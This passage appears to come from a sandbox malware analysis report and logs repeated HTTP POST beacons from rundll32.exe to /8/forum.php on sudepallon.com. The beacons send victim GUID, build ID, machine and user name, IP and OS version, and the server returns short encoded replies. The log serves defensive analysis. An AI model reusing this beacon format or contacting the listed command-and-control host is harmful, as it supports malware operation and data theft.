                              Data Ascii: cNNMMARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              60192.168.2.34978777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:55.950061083 CEST5455OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:56.015472889 CEST5455INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:57 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 41 46 55 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cAFUZARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              6195.213.179.6780192.168.2.349788C:\Windows\SysWOW64\svchost.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              62192.168.2.34978977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:56.281801939 CEST5458OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:56.350697041 CEST5459INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:57 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cJHSQARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              63192.168.2.34979077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:57.506844044 CEST5459OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:57.572794914 CEST5460INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cZJQAARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              64192.168.2.34979177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:57.533869982 CEST5460OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:57.601253033 CEST5461INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cTZAGARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              65192.168.2.34979277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:57.860013962 CEST5461OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:57.924782038 CEST5462INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cZYBAARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              66192.168.2.34979377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:57.953269958 CEST5463OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.020178080 CEST5464INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 46 4d 4e 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cFMNUARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              67192.168.2.34979477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:57.962085962 CEST5463OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.030364037 CEST5464INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cJHSQARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              68192.168.2.34979577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:58.261405945 CEST5465OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.330001116 CEST5466INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 47 54 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVGTEARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              69192.168.2.34979677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:58.327851057 CEST5466OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.397506952 CEST5467INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 42 4a 51 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cBJQYARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              795.213.179.6780192.168.2.349727C:\Windows\SysWOW64\svchost.exe
                              TimestampkBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              70192.168.2.34979777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:58.346272945 CEST5467OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.412498951 CEST5467INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 56 45 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cTVEGARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              71192.168.2.34979877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:58.691080093 CEST5468OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.761250973 CEST5470INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:00 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 43 43 58 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cCCXXARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              72192.168.2.34980077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:58.732633114 CEST5469OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.804646015 CEST5471INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:00 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 48 53 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cHHSSARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              73192.168.2.34979977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:58.732853889 CEST5470OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.803184032 CEST5470INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:00 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 41 5a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cKAZPARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              74192.168.2.34980277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:59.115871906 CEST5472OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.186662912 CEST5474INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:00 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 41 5a 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cMAZNARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              75192.168.2.34980177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:59.116475105 CEST5472OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.188098907 CEST5474INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:00 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4e 4d 4e 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cNMNMARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              76192.168.2.34980377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:59.121921062 CEST5473OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.186986923 CEST5474INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:00 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 43 43 58 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cCCXXARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              77192.168.2.34980477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:59.522425890 CEST5475OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.591309071 CEST5477INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 5a 41 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cMZANARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              78192.168.2.34980577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:59.522624016 CEST5476OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
